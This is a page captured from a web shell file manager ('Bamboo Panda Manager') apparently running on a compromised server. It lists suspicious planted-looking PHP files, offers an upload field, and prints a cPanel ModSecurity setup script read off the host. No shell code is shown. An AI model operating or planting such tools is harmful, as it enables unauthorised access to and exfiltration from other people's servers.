🎋 Bamboo Panda Manager 🇨🇳
📍 [ /home/topdeal/public_html/public ]
T Name Size Actions
📁 .. -
📁 assets -
📁 css -
📁 images -
📁 js -
📁 storage -
📁 vendor -
📄 .htaccess 1.52 KB
📄 0.php 57.54 KB
📄 OlgaliG 153.00 B
📄 atomlib.php 21.16 KB
📄 error_log 958.00 B
📄 gyfvzn.php.php 413.00 B
📄 index.php 6.76 KB
📄 main.php 1.67 KB
📄 mewidu.php.php 413.00 B
📄 mix-manifest.json 311.00 B
📄 noktsf.php.php 413.00 B
📄 robots.txt 448.00 B
📄 sunday.php 28.00 B
📄 web.config 1.17 KB
📄 wonderful.gz 2.69 KB
📄 wonderful.php 157.00 B
📄 wp-freedom.php 52.43 KB
📄 zzz.zip 1.87 KB
Το Μικρό Νάγκετ

Your IP : 104.23.243.180


Current Path : /scripts/
Upload Files:
Current File: //scripts/setup_modsec_db

#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/setup_modsec_db                 Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# [email protected]                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

package scripts::setup_modsec_db;

use strict;

use Cpanel::ModSecurity::DB ();
use Cpanel::Logger          ();
use Cpanel::Locale          ();

if (@ARGV) {
    die <<EOU;
usage: $0

Performs a non-destructive setup of the modsec database and hits table. (In other words,
ensures that they are present, but doesn't wipe any existing data.)

This script does not accept any arguments.
EOU
}

exit run() unless caller;

sub run {
    my $logger = Cpanel::Logger->new();
    my $lh     = Cpanel::Locale->new();

    # Non-destructive setup of the database and table, in case they're not already set up.
    eval { Cpanel::ModSecurity::DB::initialize_database() };
    if ( my $exception = $@ ) {
        $logger->warn( $lh->maketext( q{The system could not initialize the [asis,ModSecurity™] database: [_1]}, $exception ) );
        exit 1;
    }
    else {
        $logger->info( $lh->maketext(q{Initialized [asis,ModSecurity™] database.}) );
    }

    exit 0;
}

1;

Access denied.